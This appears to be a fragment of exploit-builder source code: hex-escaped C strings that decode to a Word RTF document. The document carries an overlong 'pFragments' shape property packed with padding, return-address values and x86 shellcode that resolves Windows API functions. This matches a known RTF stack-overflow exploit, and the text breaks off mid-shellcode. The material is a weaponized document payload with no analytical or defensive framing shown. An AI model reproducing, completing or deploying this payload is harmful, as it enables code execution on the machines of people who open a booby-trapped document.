"\x61\x72\x73\x65\x74\x31\x38\x36\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x42" "\x61\x6C\x74\x69\x63\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34\x35\x5C\x66" "\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36" "\x33\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65" "\x77\x20\x52\x6F\x6D\x61\x6E\x20\x28\x56\x69\x65\x74\x6E\x61\x6D" "\x65\x73\x65\x29\x3B\x7D\x7B\x5C\x66\x31\x36\x39\x5C\x66\x6E\x69" "\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71" "\x32\x20\x53\x69\x6D\x53\x75\x6E\x20\x57\x65\x73\x74\x65\x72\x6E" "\x7B\x5C\x2A\x5C\x66\x61\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D" "\x3B\x7D\x7B\x5C\x66\x33\x39\x39\x5C\x66\x6E\x69\x6C\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x20\x40\x5C" "\x27\x63\x62\x5C\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x20" "\x57\x65\x73\x74\x65\x72\x6E\x3B\x7D\x7D\x7B\x5C\x63\x6F\x6C\x6F" "\x72\x74\x62\x6C\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E" "\x30\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72" "\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65" "\x64\x30\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65" "\x32\x35\x35\x3B\x0D\x0A\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65" "\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32" "\x35\x35\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35" "\x35\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x30" "\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67" "\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72" "\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62" "\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65" "\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64" "\x30\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x31" "\x32\x38\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E\x31\x32" 
"\x38\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C" "\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C" "\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C" "\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65" "\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x30\x3B\x0D\x0A\x5C\x72\x65" "\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C" "\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64\x31\x39\x32\x5C\x67\x72" "\x65\x65\x6E\x31\x39\x32\x5C\x62\x6C\x75\x65\x31\x39\x32\x3B\x7D" "\x7B\x5C\x73\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x7B\x5C\x71\x6A" "\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C\x6E\x6F\x77\x69\x64\x63" "\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C" "\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75" "\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72" "\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69" "\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32\x34\x5C\x61\x6C\x61\x6E" "\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C\x6C\x61\x6E\x67\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x5C\x6B\x65" "\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63\x68\x5C\x66\x30\x5C\x68" "\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63\x68\x5C\x61\x66\x31" "\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C\x61\x6E\x67\x6E\x70\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x6E\x70\x32\x30\x35\x32\x20" "\x5C\x73\x6E\x65\x78\x74\x30\x20\x4E\x6F\x72\x6D\x61\x6C\x3B\x7D" "\x7B\x5C\x2A\x5C\x63\x73\x31\x30\x20\x5C\x61\x64\x64\x69\x74\x69" "\x76\x65\x20\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20" "\x44\x65\x66\x61\x75\x6C\x74\x20\x50\x61\x72\x61\x67\x72\x61\x70" "\x68\x20\x46\x6F\x6E\x74\x3B\x7D\x7B\x5C\x2A\x0D\x0A\x5C\x74\x73" "\x31\x31\x5C\x74\x73\x72\x6F\x77\x64\x5C\x74\x72\x66\x74\x73\x57" 
"\x69\x64\x74\x68\x42\x33\x5C\x74\x72\x70\x61\x64\x64\x6C\x31\x30" "\x38\x5C\x74\x72\x70\x61\x64\x64\x72\x31\x30\x38\x5C\x74\x72\x70" "\x61\x64\x64\x66\x6C\x33\x5C\x74\x72\x70\x61\x64\x64\x66\x74\x33" "\x5C\x74\x72\x70\x61\x64\x64\x66\x62\x33\x5C\x74\x72\x70\x61\x64" "\x64\x66\x72\x33\x5C\x74\x72\x63\x62\x70\x61\x74\x31\x5C\x74\x72" "\x63\x66\x70\x61\x74\x31\x5C\x74\x62\x6C\x69\x6E\x64\x30\x5C\x74" "\x62\x6C\x69\x6E\x64\x74\x79\x70\x65\x33\x5C\x74\x73\x63\x65\x6C" "\x6C\x77\x69\x64\x74\x68\x66\x74\x73\x30\x5C\x74\x73\x76\x65\x72" "\x74\x61\x6C\x74\x5C\x74\x73\x62\x72\x64\x72\x74\x5C\x74\x73\x62" "\x72\x64\x72\x6C\x5C\x74\x73\x62\x72\x64\x72\x62\x5C\x74\x73\x62" "\x72\x64\x72\x72\x5C\x74\x73\x62\x72\x64\x72\x64\x67\x6C\x5C\x74" "\x73\x62\x72\x64\x72\x64\x67\x72\x5C\x74\x73\x62\x72\x64\x72\x68" "\x5C\x74\x73\x62\x72\x64\x72\x76\x20\x0D\x0A\x5C\x71\x6C\x20\x5C" "\x6C\x69\x30\x5C\x72\x69\x30\x5C\x77\x69\x64\x63\x74\x6C\x70\x61" "\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73" "\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61" "\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74" "\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30" "\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66" "\x30\x5C\x61\x66\x73\x32\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66" "\x63\x73\x30\x20\x5C\x66\x73\x32\x30\x5C\x6C\x61\x6E\x67\x31\x30" "\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65\x31\x30\x32\x34\x5C\x6C\x6F" "\x63\x68\x5C\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x31\x30\x32\x34\x20\x5C\x73\x6E\x65\x78\x74\x31\x31\x20" "\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20\x4E\x6F\x72" "\x6D\x61\x6C\x20\x54\x61\x62\x6C\x65\x3B\x7D\x7D\x0D\x0A\x7B\x5C" "\x2A\x5C\x6C\x61\x74\x65\x6E\x74\x73\x74\x79\x6C\x65\x73\x5C\x6C" 
"\x73\x64\x73\x74\x69\x6D\x61\x78\x31\x35\x36\x5C\x6C\x73\x64\x6C" "\x6F\x63\x6B\x65\x64\x64\x65\x66\x30\x7D\x7B\x5C\x2A\x5C\x72\x73" "\x69\x64\x74\x62\x6C\x20\x5C\x72\x73\x69\x64\x31\x35\x38\x30\x37" "\x35\x31\x39\x7D\x7B\x5C\x2A\x5C\x67\x65\x6E\x65\x72\x61\x74\x6F" "\x72\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x57\x6F\x72\x64" "\x20\x31\x31\x2E\x30\x2E\x30\x30\x30\x30\x3B\x7D\x7B\x5C\x69\x6E" "\x66\x6F\x7B\x5C\x74\x69\x74\x6C\x65\x20\x46\x66\x66\x66\x66\x66" "\x66\x66\x66\x7D\x7B\x5C\x61\x75\x74\x68\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x6F\x70\x65\x72\x61\x74\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x63\x72\x65\x61\x74\x69\x6D\x5C\x79\x72\x32\x30" "\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C\x68\x72\x31\x34" "\x5C\x6D\x69\x6E\x35\x30\x7D\x7B\x5C\x72\x65\x76\x74\x69\x6D\x5C" "\x79\x72\x32\x30\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C" "\x68\x72\x31\x34\x5C\x6D\x69\x6E\x35\x31\x7D\x7B\x5C\x76\x65\x72" "\x73\x69\x6F\x6E\x31\x7D\x0D\x0A\x7B\x5C\x65\x64\x6D\x69\x6E\x73" "\x31\x7D\x7B\x5C\x6E\x6F\x66\x70\x61\x67\x65\x73\x31\x7D\x7B\x5C" "\x6E\x6F\x66\x77\x6F\x72\x64\x73\x31\x7D\x7B\x5C\x6E\x6F\x66\x63" "\x68\x61\x72\x73\x39\x7D\x7B\x5C\x2A\x5C\x63\x6F\x6D\x70\x61\x6E" "\x79\x20\x43\x48\x49\x4E\x41\x7D\x7B\x5C\x6E\x6F\x66\x63\x68\x61" "\x72\x73\x77\x73\x39\x7D\x7B\x5C\x76\x65\x72\x6E\x32\x34\x36\x31" "\x33\x7D\x7B\x5C\x2A\x5C\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x30" "\x30\x30\x30\x30\x30\x30\x30\x7D\x7D\x7B\x5C\x2A\x5C\x78\x6D\x6C" "\x6E\x73\x74\x62\x6C\x20\x7B\x5C\x78\x6D\x6C\x6E\x73\x31\x20\x68" "\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x6D\x69" "\x63\x72\x6F\x73\x6F\x66\x74\x2E\x63\x6F\x6D\x2F\x6F\x66\x66\x69" "\x63\x65\x2F\x77\x6F\x72\x64\x2F\x32\x30\x30\x33\x2F\x77\x6F\x72" "\x64\x6D\x6C\x7D\x7D\x0D\x0A\x5C\x70\x61\x70\x65\x72\x77\x31\x31" "\x39\x30\x36\x5C\x70\x61\x70\x65\x72\x68\x31\x36\x38\x33\x38\x5C" "\x6D\x61\x72\x67\x6C\x31\x38\x30\x30\x5C\x6D\x61\x72\x67\x72\x31" 
"\x38\x30\x30\x5C\x6D\x61\x72\x67\x74\x31\x34\x34\x30\x5C\x6D\x61" "\x72\x67\x62\x31\x34\x34\x30\x5C\x67\x75\x74\x74\x65\x72\x30\x5C" "\x6C\x74\x72\x73\x65\x63\x74\x20\x0D\x0A\x5C\x64\x65\x66\x74\x61" "\x62\x34\x32\x30\x5C\x66\x74\x6E\x62\x6A\x5C\x61\x65\x6E\x64\x64" "\x6F\x63\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64\x73\x79\x73" "\x66\x6F\x6E\x74\x31\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64" "\x6C\x69\x6E\x67\x64\x61\x74\x61\x30\x5C\x67\x72\x66\x64\x6F\x63" "\x65\x76\x65\x6E\x74\x73\x30\x5C\x76\x61\x6C\x69\x64\x61\x74\x65" "\x78\x6D\x6C\x31\x5C\x73\x68\x6F\x77\x70\x6C\x61\x63\x65\x68\x6F" "\x6C\x64\x74\x65\x78\x74\x30\x5C\x69\x67\x6E\x6F\x72\x65\x6D\x69" "\x78\x65\x64\x63\x6F\x6E\x74\x65\x6E\x74\x30\x5C\x73\x61\x76\x65" "\x69\x6E\x76\x61\x6C\x69\x64\x78\x6D\x6C\x30\x5C\x73\x68\x6F\x77" "\x78\x6D\x6C\x65\x72\x72\x6F\x72\x73\x31\x5C\x66\x6F\x72\x6D\x73" "\x68\x61\x64\x65\x5C\x68\x6F\x72\x7A\x64\x6F\x63\x5C\x64\x67\x6D" "\x61\x72\x67\x69\x6E\x5C\x64\x67\x68\x73\x70\x61\x63\x65\x31\x38" "\x30\x5C\x64\x67\x76\x73\x70\x61\x63\x65\x31\x35\x36\x5C\x64\x67" "\x68\x6F\x72\x69\x67\x69\x6E\x31\x38\x30\x30\x5C\x64\x67\x76\x6F" "\x72\x69\x67\x69\x6E\x31\x34\x34\x30\x5C\x64\x67\x68\x73\x68\x6F" "\x77\x30\x0D\x0A\x5C\x64\x67\x76\x73\x68\x6F\x77\x32\x5C\x6A\x63" "\x6F\x6D\x70\x72\x65\x73\x73\x5C\x6C\x6E\x6F\x6E\x67\x72\x69\x64" "\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x31\x5C\x76\x69\x65\x77\x73" "\x63\x61\x6C\x65\x31\x30\x30\x5C\x73\x70\x6C\x79\x74\x77\x6E\x69" "\x6E\x65\x5C\x66\x74\x6E\x6C\x79\x74\x77\x6E\x69\x6E\x65\x5C\x68" "\x74\x6D\x61\x75\x74\x73\x70\x5C\x75\x73\x65\x6C\x74\x62\x61\x6C" "\x6E\x5C\x61\x6C\x6E\x74\x62\x6C\x69\x6E\x64\x5C\x6C\x79\x74\x63" "\x61\x6C\x63\x74\x62\x6C\x77\x64\x5C\x6C\x79\x74\x74\x62\x6C\x72" "\x74\x67\x72\x5C\x6C\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x6E\x6F" "\x62\x72\x6B\x77\x72\x70\x74\x62\x6C\x5C\x76\x69\x65\x77\x6E\x6F" "\x62\x6F\x75\x6E\x64\x31\x5C\x73\x6E\x61\x70\x74\x6F\x67\x72\x69" 
"\x64\x69\x6E\x63\x65\x6C\x6C\x5C\x61\x6C\x6C\x6F\x77\x66\x69\x65" "\x6C\x64\x65\x6E\x64\x73\x65\x6C\x5C\x77\x72\x70\x70\x75\x6E\x63" "\x74\x5C\x61\x73\x69\x61\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x72" "\x73\x69\x64\x72\x6F\x6F\x74\x31\x35\x38\x30\x37\x35\x31\x39\x0D" "\x0A\x5C\x6E\x65\x77\x74\x62\x6C\x73\x74\x79\x72\x75\x6C\x73\x5C" "\x6E\x6F\x67\x72\x6F\x77\x61\x75\x74\x6F\x66\x69\x74\x20\x7B\x5C" "\x2A\x5C\x66\x63\x68\x61\x72\x73\x20\x0D\x0A\x21\x29\x2C\x2E\x3A" "\x5C\x27\x33\x62\x3F\x5D\x5C\x27\x37\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x37\x5C\x27\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27" "\x61\x36\x5C\x27\x61\x31\x5C\x27\x61\x35\x5C\x27\x61\x38\x5C\x27" "\x34\x34\x5C\x27\x61\x31\x5C\x27\x61\x63\x5C\x27\x61\x31\x5C\x27" "\x61\x66\x5C\x27\x61\x31\x5C\x27\x62\x31\x5C\x27\x61\x31\x5C\x27" "\x61\x64\x5C\x27\x61\x31\x5C\x27\x63\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x32\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x38\x5C\x27\x61\x31\x5C\x27\x61\x39\x5C\x27\x61\x31\x5C\x27" "\x62\x35\x5C\x27\x61\x31\x5C\x27\x62\x37\x5C\x27\x61\x31\x5C\x27" "\x62\x39\x5C\x27\x61\x31\x5C\x27\x62\x62\x5C\x27\x61\x31\x5C\x27" "\x62\x66\x5C\x27\x61\x31\x5C\x27\x62\x33\x5C\x27\x61\x31\x5C\x27" "\x62\x64\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27" "\x61\x32\x5C\x27\x61\x33\x5C\x27\x61\x37\x5C\x27\x61\x33\x5C\x27" "\x61\x39\x5C\x27\x61\x33\x5C\x27\x61\x63\x5C\x27\x61\x33\x5C\x27" "\x61\x65\x5C\x27\x61\x33\x5C\x27\x62\x61\x5C\x27\x61\x33\x5C\x27" "\x62\x62\x5C\x27\x61\x33\x5C\x27\x62\x66\x5C\x27\x61\x33\x5C\x27" "\x64\x64\x5C\x27\x61\x33\x5C\x27\x65\x30\x5C\x27\x61\x33\x5C\x27" "\x66\x63\x5C\x27\x61\x33\x5C\x27\x66\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x62\x5C\x27\x61\x31\x5C\x27\x65\x39\x0D\x0A\x7D\x7B\x5C\x2A" "\x5C\x6C\x63\x68\x61\x72\x73\x20\x28\x5B\x5C\x27\x37\x62\x5C\x27" "\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27\x61\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x30\x5C\x27\x61\x31\x5C\x27\x62\x34\x5C\x27" 
"\x61\x31\x5C\x27\x62\x36\x5C\x27\x61\x31\x5C\x27\x62\x38\x5C\x27" "\x61\x31\x5C\x27\x62\x61\x5C\x27\x61\x31\x5C\x27\x62\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x32\x5C\x27\x61\x31\x5C\x27\x62\x63\x5C\x27" "\x61\x33\x5C\x27\x61\x38\x5C\x27\x61\x33\x5C\x27\x61\x65\x5C\x27" "\x61\x33\x5C\x27\x64\x62\x5C\x27\x61\x33\x5C\x27\x66\x62\x5C\x27" "\x61\x31\x5C\x27\x65\x61\x5C\x27\x61\x33\x5C\x27\x61\x34\x7D\x5C" "\x66\x65\x74\x30\x7B\x5C\x2A\x5C\x77\x67\x72\x66\x66\x6D\x74\x66" "\x69\x6C\x74\x65\x72\x20\x30\x31\x33\x66\x7D\x5C\x69\x6C\x66\x6F" "\x6D\x61\x63\x61\x74\x63\x6C\x6E\x75\x70\x30\x5C\x6C\x74\x72\x70" "\x61\x72\x20\x5C\x73\x65\x63\x74\x64\x20\x5C\x6C\x74\x72\x73\x65" "\x63\x74\x0D\x0A\x5C\x6C\x69\x6E\x65\x78\x30\x5C\x68\x65\x61\x64" "\x65\x72\x79\x38\x35\x31\x5C\x66\x6F\x6F\x74\x65\x72\x79\x39\x39" "\x32\x5C\x63\x6F\x6C\x73\x78\x34\x32\x35\x5C\x65\x6E\x64\x6E\x68" "\x65\x72\x65\x5C\x73\x65\x63\x74\x6C\x69\x6E\x65\x67\x72\x69\x64" "\x33\x31\x32\x5C\x73\x65\x63\x74\x73\x70\x65\x63\x69\x66\x79\x6C" "\x5C\x73\x66\x74\x6E\x62\x6A\x20\x7B\x5C\x2A\x5C\x70\x6E\x73\x65" "\x63\x6C\x76\x6C\x31\x5C\x70\x6E\x75\x63\x72\x6D\x5C\x70\x6E\x73" "\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32" "\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74" "\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70" "\x6E\x73\x65\x63\x6C\x76\x6C\x32\x5C\x70\x6E\x75\x63\x6C\x74\x72" "\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65" "\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70" "\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B" "\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x33\x0D\x0A\x5C\x70" "\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E" "\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67" "\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20" "\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x34" 
"\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61\x72\x74" "\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E" "\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64" "\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63" "\x6C\x76\x6C\x35\x5C\x70\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x36\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C" "\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E" "\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C" "\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B" "\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D" "\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x37\x5C\x70" "\x6E\x6C\x63\x72\x6D\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70" "\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E" "\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68" "\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63" "\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76" "\x6C\x38\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x39\x5C\x70\x6E\x6C\x63\x72\x6D\x5C\x70" "\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74" "\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C\x70" "\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C" 
"\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D" "\x5C\x70\x61\x72\x64\x5C\x70\x6C\x61\x69\x6E\x20\x5C\x6C\x74\x72" "\x70\x61\x72\x5C\x71\x6A\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C" "\x6E\x6F\x77\x69\x64\x63\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70" "\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61" "\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61" "\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C" "\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63" "\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32" "\x34\x5C\x61\x6C\x61\x6E\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72" "\x63\x68\x5C\x66\x63\x73\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C" "\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32" "\x30\x35\x32\x5C\x6B\x65\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63" "\x68\x5C\x61\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x32\x30\x35\x32\x20\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66" "\x63\x73\x31\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C" "\x66\x63\x73\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38" "\x30\x37\x35\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C" "\x64\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x5C\x66" "\x30\x20\x46\x7D\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38\x30\x37\x35" "\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63" "\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x7D\x7B\x5C\x73\x68" "\x70\x7B\x5C\x73\x70\x7B\x5C\x73\x6E\x31\x09\x70\x66\x52\x61\x47" "\x4D\x65\x4E\x54\x73\x7D\x7B\x5C\x73\x76\x20\x31\x3B\x31\x3B\x30" "\x31\x31\x31\x31\x31\x31\x31\x66\x66\x30\x33\x30\x30\x30\x30\x30" 
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x32\x66\x39\x30\x39\x33\x37\x38\x30\x30\x30\x30\x38" "\x30\x37\x63\x30\x30\x30\x30\x38\x30\x37\x63\x42\x42\x42\x42\x42" "\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44" "\x44\x44\x44\x39\x30\x39\x30\x65\x62\x37\x31\x33\x31\x63\x39\x36" "\x34\x38\x62\x37\x31\x33\x30\x38\x62\x37\x36\x30\x63\x38\x62\x37" "\x36\x31\x63\x38\x62\x35\x65\x30\x38\x38\x62\x37\x65\x32\x30\x38" "\x62\x33\x36\x36\x36\x33\x39\x34\x66\x31\x38\x37\x35\x66\x32\x63" "\x33\x36\x30\x38\x62\x36\x63\x32\x34\x32\x34\x38\x62\x34\x35\x33" "\x63\x38\x62\x35\x34\x32\x38\x37\x38\x30\x31\x65\x61\x38\x62\x34" "\x61\x31\x38\x38\x62\x35\x61\x32\x30\x30\x31\x65\x62\x65\x33\x33" "\x34\x34\x39\x38\x62\x33\x34\x38\x62\x30\x31\x65\x65\x33\x31\x66" 